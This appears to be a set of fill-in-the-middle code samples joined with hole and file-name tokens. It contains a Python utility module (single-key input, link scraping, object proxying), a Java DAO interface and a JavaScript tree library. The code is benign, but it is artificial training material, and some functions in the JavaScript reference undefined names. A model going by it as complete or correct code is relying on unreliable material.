if module is None or module == str.__class__.__module__:
return cls.__name__
return module + '.' + cls.__name__
def qualified_name_import(cls):
"""Full name of a class, including the module. Like qualified_class_name, but when you already have a class """
parts = qualified_name(cls).split('.')
return "from {} import {}".format('.'.join(parts[:-1]), parts[-1])
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self):
return self.impl()
#from http://code.activestate.com/recipes/134892/
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
# Originally was raw mode, not cbreak, but raw screws up printing.
tty.setcbreak(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
getch = _Getch()
def scrape(library, url, as_html=False):
if url.startswith('s3:'):
s3 = library.filesystem.s3(url)
return scrape_s3(url, s3, as_html=as_html)
else:
return scrape_urls_from_web_page(url)
def scrape_s3(root_url, s3, as_html=False):
from os.path import join
d = dict(external_documentation={}, sources={}, links={})
for f in s3.walkfiles('/'):
if as_html:
try:
url, _ = s3.getpathurl(f).split('?', 1)
except ValueError:
url = s3.getpathurl(f)
else:
url = join(root_url, f.strip('/'))
fn = f.strip('/')
d['sources'][fn] = dict(url=url, description='', title=fn)
return d
def scrape_urls_from_web_page(page_url):
parts = list(urlsplit(page_url))
parts[2] = ''
root_url = urlunsplit(parts)
html_page = urlopen(page_url)
soup = BeautifulSoup(html_page)
d = dict(external_documentation={}, sources={}, links={})
for link in soup.findAll('a'):
if not link:
continue
if link.string:
text = str(link.string.encode('ascii', 'ignore'))
else:
text = 'None'
url = link.get('href')
if not url:
continue
if 'javascript' in url:
continue
if url.startswith('http'):
pass
elif url.startswith('/'):
url = os.path.join(root_url, url)
else:
url = os.path.join(page_url, url)
base = os.path.basename(url)
if '#' in base:
continue
try:
fn, ext = base.split('.', 1)
except ValueError:
fn = base
ext = ''
try: # Yaml adds a lot of junk to encode unicode. # FIXME. SHould use safe_dump instead
fn = str(fn)
url = str(url)
text = str(text)
except UnicodeDecodeError:
pass
# xlsm is a bug that adss 'm' to the end of the url. No idea.
if ext.lower() in ('zip', 'csv', 'xls', 'xlsx', 'xlsm', 'txt'):
d['sources'][fn] = dict(url=url, description=text)
elif ext.lower() in ('pdf', 'html'):
d['external_documentation'][fn] = dict(url=url, description=text, title=text)
else:
d['links'][text] = dict(url=url, description=text, title=text)
return d
def drop_empty(rows):
"""Transpose the columns into rows, remove all of the rows that are empty after the first cell, then
transpose back. The result is that columns that have a header but no data in the body are removed, assuming
the header is the first row. """
return zip(*[col for col in zip(*rows) if bool(filter(bool, col[1:]))])
# http://stackoverflow.com/a/20577580
def dequote(s):
"""
If a string has single or double quotes around it, remove them.
Make sure the pair of quotes match.
If a matching pair of quotes is not found, return the string unchanged.
"""
if (s[0] == s[-1]) and s.startswith(("'", '"')):
return s[1:-1]
return s
def pretty_time(s, granularity=3):
"""Pretty print time in seconds. COnverts the input time in seconds into a string with
interval names, such as days, hours and minutes
From:
http://stackoverflow.com/a/24542445/1144479
"""
intervals = (
('weeks', 604800), # 60 * 60 * 24 * 7
('days', 86400), # 60 * 60 * 24
('hours', 3600), # 60 * 60
('minutes', 60),
('seconds', 1),
)
def display_time(seconds, granularity=granularity):
result = []
for name, count in intervals:
value = seconds // count
if value:
seconds -= value * count
if value == 1:
name = name.rstrip('s')
result.append('{} {}'.format(int(value), name))
return ', '.join(result[:granularity])
return display_time(s, granularity)
# From: http://code.activestate.com/recipes/391367-deprecated/
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emmitted
when the function is used."""
def newFunc(*args, **kwargs):
warnings.warn("Call to deprecated function %s." % func.__name__,
category=DeprecationWarning)
return func(*args, **kwargs)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__dict__.update(func.__dict__)
return newFunc
def int_maybe(v):
"""Try to convert to an int and return None on failure"""
try:
return int(v)
except (TypeError, ValueError):
return None
<|fim▁hole|>def random_string(length):
import random
import string
return ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
for _ in range(length))
# From: http://code.activestate.com/recipes/496741-object-proxying/
class Proxy(object):
__slots__ = ["_obj", "__weakref__"]
def __init__(self, obj):
object.__setattr__(self, "_obj", obj)
#
# proxying (special cases)
#
def __getattribute__(self, name):
return getattr(object.__getattribute__(self, "_obj"), name)
def __delattr__(self, name):
delattr(object.__getattribute__(self, "_obj"), name)
def __setattr__(self, name, value):
setattr(object.__getattribute__(self, "_obj"), name, value)
def __nonzero__(self):
return bool(object.__getattribute__(self, "_obj"))
def __str__(self):
return str(object.__getattribute__(self, "_obj"))
def __repr__(self):
return repr(object.__getattribute__(self, "_obj"))
#
# factories
#
_special_names = [
'__abs__', '__add__', '__and__', '__call__', '__cmp__', '__coerce__',
'__contains__', '__delitem__', '__delslice__', '__div__', '__divmod__',
'__eq__', '__float__', '__floordiv__', '__ge__', '__getitem__',
'__getslice__', '__gt__', '__hash__', '__hex__', '__iadd__', '__iand__',
'__idiv__', '__idivmod__', '__ifloordiv__', '__ilshift__', '__imod__',
'__imul__', '__int__', '__invert__', '__ior__', '__ipow__', '__irshift__',
'__isub__', '__iter__', '__itruediv__', '__ixor__', '__le__', '__len__',
'__long__', '__lshift__', '__lt__', '__mod__', '__mul__', '__ne__',
'__neg__', '__oct__', '__or__', '__pos__', '__pow__', '__radd__',
'__rand__', '__rdiv__', '__rdivmod__', '__reduce__', '__reduce_ex__',
'__repr__', '__reversed__', '__rfloorfiv__', '__rlshift__', '__rmod__',
'__rmul__', '__ror__', '__rpow__', '__rrshift__', '__rshift__', '__rsub__',
'__rtruediv__', '__rxor__', '__setitem__', '__setslice__', '__sub__',
'__truediv__', '__xor__', 'next',
]
@classmethod
def _create_class_proxy(cls, theclass):
"""creates a proxy for the given class"""
def make_method(name):
def method(self, *args, **kw):
return getattr(object.__getattribute__(self, "_obj"), name)(*args, **kw)
return method
namespace = {}
for name in cls._special_names:
if hasattr(theclass, name):
namespace[name] = make_method(name)
return type("%s(%s)" % (cls.__name__, theclass.__name__), (cls,), namespace)
def __new__(cls, obj, *args, **kwargs):
"""
creates an proxy instance referencing `obj`. (obj, *args, **kwargs) are
passed to this class' __init__, so deriving classes can define an
__init__ method of their own.
note: _class_proxy_cache is unique per deriving class (each deriving
class must hold its own cache)
"""
try:
cache = cls.__dict__["_class_proxy_cache"]
except KeyError:
cls._class_proxy_cache = cache = {}
try:
theclass = cache[obj.__class__]
except KeyError:
cache[obj.__class__] = theclass = cls._create_class_proxy(obj.__class__)
ins = object.__new__(theclass)
theclass.__init__(ins, obj, *args, **kwargs)
return ins
def delete_module(modname, paranoid=None):
""" Delete a module.http://stackoverflow.com/a/1668289
:param modname:
:param paranoid:
:return:
"""
from sys import modules
try:
thismod = modules[modname]
except KeyError:
raise ValueError(modname)
these_symbols = dir(thismod)
if paranoid:
try:
paranoid[:] # sequence support
except:
raise ValueError('must supply a finite list for paranoid')
else:
these_symbols = paranoid[:]
del modules[modname]
for mod in modules.values():
try:
delattr(mod, modname)
except AttributeError:
pass
if paranoid:
for symbol in these_symbols:
if symbol[:2] == '__': # ignore special symbols
continue
try:
delattr(mod, symbol)
except AttributeError:
pass
def flatten(d, sep=None):
"""Flatten a datastructure composed of dicts, sequences and scalars. If sep is None,
the key is a tuple of key path comonents. """
def _flatten(e, parent_key):
import collections
if isinstance(e, collections.MutableMapping):
return tuple((parent_key + k2, v2) for k, v in e.items() for k2, v2 in _flatten(v, (k,)))
elif isinstance(e, collections.MutableSequence):
return tuple((parent_key + k2, v2) for i, v in enumerate(e) for k2, v2 in _flatten(v, (i,)))
else:
return (parent_key, (e,)),
return tuple((k if sep is None else sep.join(str(e) for e in k), v[0])
for k, v in _flatten(d, tuple()))<|fim▁end|> | |
<|file_name|>Dao.java<|end_file_name|><|fim▁begin|>package de.klickreform.dropkit.dao;
import de.klickreform.dropkit.exception.DuplicateEntryException;
import de.klickreform.dropkit.exception.NotFoundException;
import de.klickreform.dropkit.models.DomainModel;
import java.io.Serializable;
import java.util.Collection;
/**
* Interface for Data Access Object (DAO) implementations that provide basic CRUD operations for a
* Data Access Layer.
*
* @author Benjamin Bestmann
*/
public interface Dao<E extends DomainModel,K extends Serializable> {
public Collection<E> findAll();
public E findById(K id) throws NotFoundException;
public String create(E entity) throws DuplicateEntryException;
public String createOrUpdate(E entity);
public String update(E entity) throws NotFoundException, DuplicateEntryException;
public void delete(E entity) throws NotFoundException;<|fim▁hole|><|fim▁end|> |
} |
<|file_name|>peas.js<|end_file_name|><|fim▁begin|>//
// peas.js
//
// tree data structure in javascript
//
//////////////////////////
var peas = function() {
// "sub" here is used as an object container for
// operations related to sub nodes.
// Each pea node will have a "sub" property
// with an instance of "sub"
var sub = function() {}
// the current node is accesable as "this.pea", from
// methods in the "sub" object
sub.prototype.pea = null
// first and last sub
sub.prototype.first = null
sub.prototype.last = null
// number of sub nodes
sub.prototype.n = 0
// get subnode at index position (0 index)
sub.prototype.at = function( index ) {
var pik,i
if( index > this.pea.sub.n - 1 )
return null
pik = this.pea.sub.first
for( i=0; i<index; i++ )
pik = pik.next
return pik
}
// add spare node at last position
// returns the added node
sub.prototype.add = function( spare ) {
if( this.pea.sub.last ) {
spare.prev = this.pea.sub.last
this.pea.sub.last.next = spare
this.pea.sub.last = spare
} else {
spare.prev = null
this.pea.sub.first = spare
this.pea.sub.last = spare
}
spare.top = this.pea
spare.next = null
this.pea.sub.n++
return spare
}
// insert sub node at index position
// returns the inserted node
sub.prototype.insertAt = function( spare, index ) {
var pik
// validate index given<|fim▁hole|> if( index < 0 )
throw "node insert failed, invalid index"
if( index > this.pea.sub.n )
throw "node insert failed, given index exceeds valid places"
// if insert at last+1, then just add
if( index == this.pea.sub.n ) {
this.pea.add( spare )
return
}
pik = this.pea.sub.at( index )
spare.prev = pik.prev
spare.next = pik
// if not inserting at first
if( pik.prev ) {
pik.prev.next = spare
} else {
// inserting as first
pik.top.sub.first = spare
}
pik.prev = spare
spare.top = this.pea
this.pea.sub.n++
return spare
}
// executes function "action" on each direct
// sub node (not recursive)
sub.prototype.each = function( action ) {
var node = this.pea.sub.first
while( node ) {
action( node )
node = node.next
}
}
///////////////////////////
// constructor function for pea nodes
peas = function( item ) {
this.sub = new sub()
this.sub.pea = this
this.item = item
}
peas.prototype.item = null
// top node
peas.prototype.top = null
// prev
peas.prototype.prev = null
// next
peas.prototype.next = null
// namespace for sub nodes
peas.prototype.sub = {}
// find the root node, of the tree
// of this node
peas.prototype.root = function() {
var node = this
while ( node.top ) node = node.top
}
// executes function func on all the tree
// nodes below (recursively)
peas.prototype.onAllBelow = function( action ) {
var node = this.sub.first
while( node ) {
action( node )
if( node.sub.n > 0 )
nodeMethods.each( action )
node = node.next
}
}
// removes this node from tree, leaving
// other tree nodes in consistent state
peas.prototype.rip = function() {
if( ! this.top ) return this
if( this.next )
this.next.prev = this.prev
if( this.prev )
this.prev.next = this.next
if( this.top.sub.last == this )
this.top.sub.last = this.prev
if( this.top.sub.first == this )
this.top.sub.first = this.next
this.top.sub.n--
this.top = null
this.next = null
this.prev = null
return this
}
// returns an array containing all nodes below this, in the tree
peas.prototype.flat = function() {
var flat = []
var grab = function( node ) {
flat.push( node )
}
root.onAllBelow( grab )
return flat
}
// puts spare node in the tree,
// before of this node.
// returns the inserted node
peas.prototype.putBefore = function( spare ) {
if( ! this.top )
throw "not in a tree"
if ( this.prev )
this.prev.next = spare
if( this.top.sub.first == this )
this.top.sub.first = spare
spare.next = this
spare.prev = this.prev
this.prev = spare
spare.top = this.top
this.top.sub.n++
return spare
}
return peas
}()<|fim▁end|> |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.